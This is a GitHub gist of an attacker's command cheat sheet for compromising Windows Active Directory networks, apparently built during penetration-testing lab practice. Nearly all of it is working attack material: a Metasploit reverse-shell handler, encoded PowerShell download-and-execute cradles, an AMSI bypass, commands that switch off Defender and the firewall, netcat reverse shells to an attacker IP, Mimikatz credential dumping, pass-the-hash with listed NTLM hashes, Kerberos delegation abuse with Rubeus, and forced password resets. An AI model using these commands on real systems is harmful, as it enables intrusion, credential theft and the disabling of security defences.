Skip to content

Instantly share code, notes, and snippets.

@siddicky

siddicky/commands.md

Created January 17, 2024 19:34
Show Gist options
  • Save siddicky/bf3a0a04c1fc8ea63b0aa0c78977726b to your computer and use it in GitHub Desktop.
Save siddicky/bf3a0a04c1fc8ea63b0aa0c78977726b to your computer and use it in GitHub Desktop.
Download ZIP
Raw
commands.md
Host IP
192.168.100.1

Launch msfconsole

service postgresql start
sudo msfdb start
msfconsole -qr /home/siddicky/tools/multi-handler.rc
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST eth0
set LPORT 443
set ExitOnSession false
set EnableStageEncoding true
set StageEncoder x64/xor_dynamic
exploit -jz

# Shorhand for launching handler
handler -H '192.168.100.1' -P <PORT> -p <payload> {-x if you want to set exitonsession true}

Getting Reverse Shell

$Command = "(New-Object System.Net.WebClient).DownloadString('http://192.168.100.1/pwn.ps1') | IEX"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Command)
$EncodedCommand = [Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell -Sta -Nop -Window Hidden -EncodedCommand $EncodedCommand

KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAOQAuADgANwAvAHAAdwBuAC4AcABzADEAJwApACAAfAAgAEkARQBYAA==

Shells should primarily be spawned using pwn.ps1 and adding the scirpts there pwn.ps1

Invoke-Expression(Invoke-WebRequest 'http://192.168.100.1/amsi3.txt' -UseBasicParsing);
Invoke-Expression(Invoke-WebRequest 'http://192.168.100.1/Invoke-Sharpcradle.ps1' -UseBasicParsing);
# Invoke-Sharpcradle -uri http://192.168.100.1/ParentHollowInjectStager.exe -Argument1 /port:443 -Argument2 /program:C:\windows\system32\notepad.exe -Argument3 /parent:spoolsv
#(New-Object System.Net.WebClient).DownloadString('192.168.100.1/Invoke-Stager.ps1') | Invoke-Expression;
#Invoke-Stager "run 192.168.100.1 443"

AMSI BYPASS

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf =  @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

Directories for base

# Chanding dir from meterpreter
C:\\Windows\\Tasks
C:\\Windows\\Temp
C:\\Windows\\System32\\spool\\PRINTERS
C:\\Windows\\System32\\spool\\drivers\\color
# Changing dir from cmd/ps
C:\Windows\Tasks
C:\Windows\Temp
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\drivers\color

Downloading scripts/files on Target

Enumeration Workflow

if ($env:Username -eq ($env:COMPUTERNAME + "$")) {
      $Location = "C:\Enum"
} else {
      $Location = $env:HOMEDRIVE + $env:HOMEPATH + "\Enum" 
}
# Create Main Directory mkdir -Force $Location
# Remove Signature
& 'C:\Program Files\Windows Defender\MpCmdRun.exe' -RemoveDefinitions -All 2>&1 | Out-File - FilePath ($Location + "\MpCmdRun-output.txt")
# Applocker Enum
Write-Output "[*] Checking for Applocker Rules"
mkdir -Force ($Location + "\Applocker")
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe 2>&1 | Out-File - FilePath ($Location + "\Applocker\Exe-Restriction.txt")
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Dll 2>&1 | Out-File - FilePath ($Location + "\Applocker\Dll-Restriction.txt") 
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Msi 2>&1 | Out-File - FilePath ($Location + "\Applocker\Msi-Restriction.txt")
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Script 2>&1 | Out-File - FilePath ($Location + "\Applocker\Script-Restriction.txt")
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Appx 2>&1 | Out-File - FilePath ($Location + "\Applocker\Appx-Restriction.txt")
$Language_Mode = $ExecutionContext.SessionState.LanguageMode
$Language_Mode 2>&1 | Out-File -FilePath ($Location + "\Applocker\Language_Mode.txt")
if ($Language_Mode -eq "FullLanguage") {
      # AMSI Disable
      Write-Output "[*] Disabling av util"
      (New-Object Net.WebClient).DownloadString('http://192.168.100.1/bypass_util.txt') | Invoke- Expression
      # PowerUp
      Write-Output "[*] Invoking PowerUp"
      (New-Object Net.WebClient).DownloadString('http://192.168.100.1/PowerUp.ps1') | Invoke- Expression
      Invoke-AllChecks 2>&1 | Out-File -FilePath ($Location + "\PowerUp.txt")
      # Download Cradles
      Write-Output "[*] Downloading Cradles"
      (New-Object Net.WebClient).DownloadString('http://192.168.100.1/HostRecon.ps1') | Invoke- Expression
      (New-Object Net.WebClient).DownloadString('http://192.168.100.1/SharpHound.ps1') | Invoke- Expression
      (New-Object Net.WebClient).DownloadString('http://192.168.100.1/PowerUpSQL.ps1') | Invoke- Expression
      (New-Object Net.WebClient).DownloadString('http://192.168.100.1/PowerView.ps1') | Invoke- Expression
      (New-Object Net.WebClient).DownloadString('http://192.168.100.1/LAPSToolkit.txt') | Invoke- Expression
      # HostRecon
      Write-Output "[*] Invoking HostRecon"
      Invoke-HostRecon 2>&1 | Out-File -FilePath ($Location + "\HostRecon.txt")
      # SharpHound
      Write-Output "[*] Invoking Bloodhound"
      Invoke-Bloodhound -CollectionMethod All -OutputDirectory $Location
      # PowerView
      Write-Output "[*] Enumerating Using PowerView"
      mkdir -Force ($Location + "\PowerView")
      Get-DomainUser 2>&1 | Out-File -FilePath ($Location + "\PowerView\Get-DomainUser.txt")
      Get-DomainGroup 2>&1 | Out-File -FilePath ($Location + "\PowerView\Get-DomainGroup.txt")
      Get-DomainComputer 2>&1 | Out-File -FilePath ($Location + "\PowerView\Get- DomainComputer.txt")
      Get-DomainComputer -TrustedToAuth 2>&1 | Out-File -FilePath ($Location + "\PowerView\ Constrained-Delegation.txt")
      Get-DomainComputer -Unconstrained 2>&1 | Out-File -FilePath ($Location + "\PowerView\ Unconstrained-Delegation.txt")
      Get-DomainUser -TrustedToAuth 2>&1 | Out-File -FilePath ($Location + "\PowerView\User- Constrained-Delegation.txt")
      Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object { $_ | Add-Member - NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_ } | Foreach-Object { if ($_.Identity -eq $("$env:UserDomain\$env:Username")) { $_ } } 2>&1 | Out-File -FilePath ($Location + "\PowerView\ACL-Permission-for-User.txt")
      Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object { $_ | Add-Member - NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_ } | Foreach-Object { if ($_.Identity -eq $("$env:UserDomain\$env:Username")) { $_ } } 2>&1 | Out-File -FilePath ($Location + "\PowerView\ACL-Permission-for-Group.txt")
      Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs | Foreach-Object { $_ | Add-Member - NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_ } | Foreach-Object { if ($_.Identity -eq $("$env:UserDomain\$env:Username")) { $_ } } 2>&1 | Out-File -FilePath ($Location + "\PowerView\ACL-Permission-for-Computer.txt")
      # LAPSToolkit
      Find-LAPSDelegatedGroups 2>&1 | Out-File -FilePath ($Location + "\Find-LAPSDelegatedGroups.txt")
      Get-LAPSComputers 2>&1 | Out-File -FilePath ($Location + "\Get-LAPSComputers.txt")
      # PowerUpSQL
      mkdir -Force ($Location + "\PowerUpSQL")
      Get-SQLInstanceDomain 2>&1 | Out-File -FilePath ($Location + "\PowerUpSQL\Get- SQLInstanceDomain.txt")
      # Domain Trust
      mkdir -Force ($Location + "\Domain-Trust")
      nltest /trusted_domains 2>&1 | Out-File -FilePath ($Location + "\Domain-Trust\nltest-trust.txt")
      Get-DomainTrust -API 2>&1 | Out-File -FilePath ($Location + "\Domain-Trust\Get-DomainTrust.txt")
      Get-DomainTrust 2>&1 | Out-File -FilePath ($Location + "\Domain-Trust\Get-DomainTrust-With- LDAP.txt")
      # Forest Trust
      mkdir -Force ($Location + "\Forest-Trust")
      ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() 2>&1 | Out-File -FilePath ($Location + "\Forest-Trust\dotnet-GetAllTrustRelationships.txt")
      Get-DomainTrustMapping 2>&1 | Out-File -FilePath ($Location + "\Forest-Trust\Get- DomainTrustMapping.txt")
      Invoke-ShareFinder 2>&1 | Out-File -FilePath ($Location + "\PowerView\Shares-List.txt")
}
# PowerView / SharpView 
iex(new-object net.webclient).downloadstring('http://192.168.100.1/PowerView.ps1');DomainTrustMapping
Get-DomainComputer -Domain <Domain> | Resolve-IPAddress
iex(new-object net.webclient).downloadstring('http://192.168.100.1/Invoke-Sharpview.ps1')
# Obfuscated SharpView
iwr "http://192.168.100.1/ObfSharpView.exe" -outfile "C:\Windows\Tasks\ObfSharpView.exe"


## Get All Domains 
$domains = "<domain1","domain2","domain3"
foreach ($domain in $domains) {Get-DomainComputer -Domain $domain | Resolve-IPAddress}

# PowerUp / SharpUP
iex(new-object net.webclient).downloadstring('http://192.168.100.1/PowerUp.ps1');Invoke-AllChecks
iex(new-object net.webclient).downloadstring('http://192.168.100.1/Invoke-SharpUp.ps1')

# Turtle Toolkit
$a=[System.Reflection.Assembly]::Load($(IWR -Uri http://192.168.100.1/TurtleToolKit.dll -UseBasicParsing).Content); Import-Module -Assembly $a

# Invoke-BloodHound
iex(new-object net.webclient).downloadstring('http://192.168.100.1/Invoke-Sharphound.ps1');Invoke-Sharphound -CollectionMethod All,GPOLocalGroup -Domain <Domain_Name1>;Invoke-Sharphound -CollectionMethod All -Domain <Domain_Name2>;Invoke-Sharphound -CollectionMethod All -Domain <Domain_Name3>

# SharpHound.exe
iwr "http://192.168.100.1/SharpHound.exe" -outfile "C:\Windows\Tasks\SharpHound.exe"

# Mimikatz.exe
iwr "http://192.168.100.1/mimikatz.exe" -outfile "C:\Windows\Tasks\mimikatz.exe"
## Log commands to be parsed later

# Rubeus / Invoke-Rubeus / Obfuscated Rubeus
iwr "http://192.168.100.1/Rubeus.exe" -outfile "C:\Windows\Tasks\Rubeus.exe"
iex(new-object net.webclient).downloadstring('http://192.168.100.1/Invoke-Rubeus.ps1')
iwr "http://192.168.100.1/ObfRubeus.exe" -outfile "C:\Windows\Tasks\ObfRubeus.exe"

# Obfuscated Stager
iwr "http://192.168.100.1/StagerObfRot.exe" -outfile "C:\Windows\Tasks\StagerObfRot.exe"

# Obfuscated Hollow Injection
iwr "http://192.168.100.1/ObfStagedHI.exe" -outfile "C:\Windows\Tasks\ObfStagedHI.exe"

# Obfuscated Parent Hollow Injection
iwr "http://192.168.100.1/ObfStagedPHI.exe" -outfile "C:\Windows\Tasks\ObfStagedPHI.exe"

# Invoke-winPEAS
iex(new-object net.webclient).downloadstring('http://192.168.100.1/Invoke-winPEAS.ps1')

# Invoke-adPeas
iex(new-object net.webclient).downloadstring('http://192.168.100.1/adPEAS-Light.ps1')
iex(new-object net.webclient).downloadstring('http://192.168.100.1/adPEAS.ps1')

# Invoke-Kerberoast
iex(new-object net.webclient).downloadstring('http://192.168.100.1/Invoke-Kerberoast.ps1')
Invoke-Kerberoast -Domain <Domain> -OutputFormat john | Select-Object -ExpandProperty hash |% {$_.replace(':',':$krb5tgs$23$')}
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII allison.hash

# PrintSpoofer / SweetPotato
iwr "http://192.168.100.1/PrintSpoofer64.exe" -outfile "C:\Windows\Tasks\PrintSpoofer.exe"
iwr "http://192.168.100.1/SweetPotObf.exe" -outfile "C:\Windows\Tasks\SweetPotObf.exe"

# RunasCs
iwr "http://192.168.100.1/RunasCs_net4.exe" -outfile "C:\Windows\Tasks\RunasCs.exe"

# LAPsToolkit
iex(new-object net.webclient).downloadstring('http://192.168.100.1/LAPSToolkit.ps1')

# SharpExec
iwr "http://192.168.100.1/SharpExec.exe" -outfile "C:\Windows\Tasks\SharpExec.exe"

# Powermad
iex(new-object net.webclient).downloadstring('http://192.168.100.1/Powermad.ps1');

# Obfuscated EDD
iwr "http://192.168.100.1/ObfEDD.exe" -outfile "C:\Windows\Tasks\ObfEDD.exe"

# KrbRelay.exe and CheckPort.exe
iwr "http://192.168.100.1/KrbRelay.exe" -outfile "C:\Windows\Tasks\KrbRelay.exe"
iwr "http://192.168.100.1/CheckPort.exe" -outfile "C:\Windows\Tasks\CheckPort.exe"

# SharpAllowedToAct.exe
iwr "http://192.168.100.1/SharpAllowedToAct.exe" -outfile "C:\Windows\Tasks\SharpAllowedToAct.exe"

# SauronEye.exe
iwr "http://192.168.100.1/SauronEye.exe" -outfile "C:\Windows\Tasks\SauronEye.exe"

# Certutil command
certutil -urlcache -split -f "http://192.168.100.1/<File Name>" "C:\Windows\Taks\<File Name>"

Disable AV

Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true
netsh AdvFirewall set allprofiles state off

Set-MpPreference -DisableRealtimeMonitoring $true

Or can use binary

iwr "http://192.168.100.1/DefenderStop_x64.exe" -outfile "C:\Windows\Tasks\DefenderStop_x64.exe"
.\DefenderStop_x64.exe

Editing REG Values

Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse

RBCD

New-MachineAccount -MachineAccount siddicky -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Verbose
Get-DomainComputer -Identity siddicky
$sid = Get-DomainComputer -Identity siddicky -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($sid))"
$SDbytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDbytes,0)
Get-DomainComputer -Identity web01.cowmotors-int.com | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
$RBCDbytes = Get-DomainComputer web01.cowmotors-int.com -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RBCDbytes, 0
$Descriptor.DiscretionaryAcl
ConvertFrom-SID S-1-5-21-2032401531-514583578-4118054891-6101
.\Rubeus.exe s4u /user:siddicky$ /rc4:<ntlm> /impersonateuser:administrator /msdsspn:CIFS/jump09.ops.Domain_Name /ptt

ObfRubeus s4u /user:siddicky$ /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /impersonateuser:administrator /msdsspn:HTTP/web01.cowmotors-int.com /ptt

ObfRubeus s4u /user:xct$ /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /impersonateuser:administrator /msdsspn:HTTP/web01.cowmotors-int.com /nowrap

invoke-command -computername web01.cowmotors-int.com -scriptblock {powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAOQAuADgANwAvAHAAdwBuAC4AcABzADEAJwApACAAfAAgAEkARQBYAA==}
 
invoke-command -computername rdc02.Domain_Name -scriptblock {iwr -uri http://192.168.100.1/nc64.exe -o c:\windows\tasks\nc64.exe; c:\windows\tasks\nc64.exe 192.168.100.1 443 -e cmd.exe}

Mimikatz

token::elevate
privilege::debug
log
sekurlsa::logonpasswords
lsadump::sam
lsadump::secrets
lsadump::cache

SID Filtering checking for parent-child domain:

netdom.exe trust ops.Domain_Name /domain:Domain_Name /quarantine

Execute commands on another machine

PsExec64.exe -s -i \\rdc02 powershell /c "iwr -uri http://192.168.100.1/nc64.exe -o c:\windows\tasks\nc64.exe; c:\windows\tasks\nc64.exe 192.168.100.1 443 -e cmd.exe"

Invoke-Command -ComputerName RDC02.Domain_Name -ScriptBlock {dir \\RDC02.Domain_Name\c$}

ENUMERATION

iex(new-object net.webclient).downloadstring('http://192.168.100.1/PowerView.ps1')
Get-DomainComputer -Domain undefined | Resolve-IPAddress
impacket-psexec -k -no-pass -target-ip 172.16.145.168 -dc-ip 172.16.145.168 dmzdc01.Domain_Name 
proxychains -q impacket-psexec Domain_Name/adminWebSvc@WEB05 -hashes ":b0df1cb0819ca0b7d476d4c868175b94"

Executing command using impacket-

# With a ticket
impacket-atexec -k admin02.denkiair.com "powershell -enc <command>"
# With Password
impacket-psexec "web01/adminsitrator:<password>@web01.denkiair.com" -c <path to binary>

Force to reset password:

iex(new-object net.webclient).downloadstring('http://192.168.100.1/PowerView.ps1')
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential ("Domain Name\User.Name", (ConvertTo-SecureString "FGjksdff89sdfj" -AsPlainText -Force)) # Can remain empty
Set-DomainUserPassword -Identity nina -AccountPassword $UserPassword -Credential $Cred

$SecPassword = ConvertTo-SecureString '<Exisiting Password>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Domain Name\User.Name', $SecPassword)
Set-DomainUserPassword -Identity <User.Name> -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Credential $Cred -Verbose

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Domain Name\User.Name', $SecPassword)
Set-DomainObject -Identity <User.Name> -Set @{"scriptpath"="\\$ip\share\<file>.bat"} -Credential $Cred -Verbose

Bat file can contain powershell command

Load kiwi:

load kiwi
kiwi_cmd "privilege::debug"
kiwi_cmd "token::elevate"
kiwi_cmd "sekurlsa::logonpasswords"
kiwi_cmd "lsadump::sam"
kiwi_cmd "lsadump::secrets"
kiwi_cmd "lsadump::cache"
iex(new-object net.webclient).downloadstring('http://192.168.100.1/PowerView.ps1'); Get-DomainComputer -Domain Domain_Name | Resolve-IPAddress

powershell  GiganticHosting.local | Resolve-IPAddress

Enable RDP pass the hash:

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

RDP:

Enable RDP and Add user to

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
netsh advfirewall set allprofiles state off
net localgroup "remote desktop users" <USER.NAME> /add

If user is already logged on

query session
logoff 1
exit
proxychains xfreerdp /v:172.16.145.194 /u:administrator /pth:f99529e42ee77dc4704c568ba9320a34 +compression +clipboard /dynamic-resolution  +toggle-fullscreen /cert-ignore

Constrained delegation:
impacket-getST -spn SPN/machine_target from_machine -hashes :X
Rubeus.exe s4u /rc4:X /impersonateuser:X /msdsspn:SPN/targeted_machine /altservice:altservice:cifs,host,http,winrm,RPCSS,wsman,krbtgt /ptt

Constrained Delegation

From windows machine: Can also use PowerSharpPack

.\Rubeus.exe s4u /user:app01$ /rc4:<ntlm> /impersonateuser:Administrator /msdsspn:"cifs/file02" /altservice:host,rpc,cifs,http /ptt

dir \\file02\c$ # if this does not work, try to add the domain to file02
Invoke-Command -computer file02 -scriptblock {whoami}

From Kali:

proxychains -q getST.py -spn cifs/file02.denkiair.com denkiair.com/app01$ -hashes :f7d087177faaf7bece6f2c8a3c926c80 -impersonate Administrator -dc-ip 172.16.xxx.101
#Also works with a password

export KRB5CCNAME=Administrator.ccache
proxychains -q impacket-psexec -k -dc-ip 172.16.xxx.101 file02.denkiair.com

Remmina through proxy

Edit the .remmina file and add the following:

proxy_type = socks5
proxy_username = 
proxy_password = 
proxy_hostname = 127.0.0.1
proxy_port = 9050

Crackmapexec Kerberos

cat matthew.b64| base64 -d > matthew.ccache
export KRB5CCNAME=$(pwd)/matthew.ccache
klist

proxychains4 -q crackmapexec smb denkiair.com --kerberos --continue-on-success # Must provide FQDNs

# Use crackmapexec to list the domain 
proxychains -q crackmapexec smb 172.16.111.0/24
# Add the FQNs to a targets file

Retrieve Hashes from password:

proxychains crackmapexec smb app01-denkiair -u Administrator -p FritterGoalCommence204 --local-auth --lsa

Dump hashes for other users:

proxychains crackmapexec smb admin02-denkiair -u Matthew.Lucas -H 5bc4a289239df6c25f74f2c13b6e4c9f --lsa

Kerberoast

Important to sync time when Kerberoasting

net time \\DC01.hackit.local /set
Get-NetAdapter ethernet0* | Set-DnsClientServerAddress -ServerAddresses @('192.168.1.10')

Using Invoke-Kerberoast and output for John

Invoke-Kerberoast -Domain <Domain Name> -OutputFormat john| Select-Object -ExpandProperty hash |% {$_.replace(':',':$krb5tgs$23$')}

Run command as different user

Using mimikatz

sekurlsa::pth /user:Molly.Dickinson /domain:denkiair.com /ntlm:82772059d311b76b3a69506a5637989e /run:"powershell -enc <>"
sekurlsa::pth /user:Molly.Dickinson /domain:denkiair.com /ntlm:82772059d311b76b3a69506a5637989e /run:"c:\\temp\\nc.exe 192.168.48.2 53 -e cmd"

Using RunasC

.\RunasCs_net4.exe offsec Start123! cmd.exe -r 192.168.48.2:53

PrintSpoofer

.\PrintSpoofer.exe -i -c "<command>"

SweetPotato

C:\Windows\Tasks\SweetPotato.exe --prog=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe --args="-c iex(iwr http://192.168.100.1/pwn.ps1 -usebasicparsing)"

Access Control Lists (ACLs)

iex(new-object net.webclient).downloadstring('http://192.168.100.1/Invoke-ACLpwn.ps1')
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -NoDCSync
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -userAccountToPwn 'Administrator'
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -LogToFile
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -NoSecCleanup
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'testuser' -Domain 'xenoflux.local' -Password 'Welcome01!'

GenericWrite

Generic write to a computer object can be used to perform a resource based constrained delegation attack.

Abusing this primitive is currently only possible through the Rubeus project.

First, if an attacker does not control an account with an SPN set, Kevin Robertson's Powermad project can be used to add a new attacker-controlled computer account:

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)

PowerView can be used to then retrieve the security identifier (SID) of the newly created computer account:

$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid

We now need to build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE:

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the comptuer account we're taking over, again using PowerView in this case:

Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

We can then use Rubeus to hash the plaintext password into its RC4_HMAC form:

Rubeus.exe hash /password:Summer2018!

And finally we can use Rubeus' *s4u* module to get a service ticket for the service name (sname) we want to "pretend" to be "admin" for. This ticket is injected (thanks to /ptt), and in this case grants us access to the file system of the TARGETCOMPUTER:

Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt
$Env:PATH += ";C:\Windows\Tasks"
  --- Smb ---
        SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET
        SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi>  /computername:TARGET

       Smb modules
          /m:shares                                   (Scan for accessible Smb shares)

    --- WinRm ---
        SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET
        SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH  /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi>  /computername:TARGET

       WinRm modules
          /m:exec /a:whoami                           (Invoke-Command)
          /m:exec /a:C:\beacon.exe /system            (Invoke-Command as System)
          /m:comsvcs                                  (Dump & parse lsass)
          /m:secrets                                  (Dump and Parse Sam, Lsa, and System Dpapi blobs)
          /m:assembly /p:Rubeus.exe /a:dump           (Execute local C# assembly in memory)
          /m:assembly /p:beacon.exe /system           (Execute local C# assembly as System in memory)
          /m:assembly /p:getMailBox.exe /delegwalk    (Execute local C# assembly in all unique delegation processes in memory)
          /m:download /path:C:\file /destination:file (Download file from host)
          /m:upload   /path:C:\file /destination:file (Upload file to host)

    --- Domain ---
        SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC
        SharpMapExec.exe tgtdeleg

    --- Ldap ---
        SharpMapExec.exe ntlm ldap /user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE
        SharpMapExec.exe kerberos ldap </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE | /ticket:TICKET.Kirbi>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment